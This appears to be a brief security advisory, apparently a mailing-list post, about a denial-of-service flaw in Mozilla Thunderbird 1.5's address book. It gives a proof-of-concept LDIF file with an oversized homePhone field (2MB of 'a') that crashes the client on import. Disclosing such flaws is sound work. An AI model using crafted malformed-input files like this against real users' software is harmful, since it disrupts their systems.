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Mozila Thunderbird 1.5 Address Book DoS

Affected: Mozila Thunderbird 1.5 /possibly other versions/

Mozila Thunderbird 1.5 address book allows fields of unlimited size in
the address book which leads to a DoS if you import such ldif file

POC: create a file.ldif and insert following then import it in address book:
------- start --------
n: cn=Test POC by DrFrancky@xxxxxxxxxxx,mail=drfrancky@xxxxxxxxxxx
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky@xxxxxxxxxxx
cn: POC by DrFrancky@xxxxxxxxxxx
mozillaNickname: DrFrancky
mail: drfrancky@xxxxxxxxxxx
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
--------- end ---------


Attachment: signature.asc
Description: OpenPGP digital signature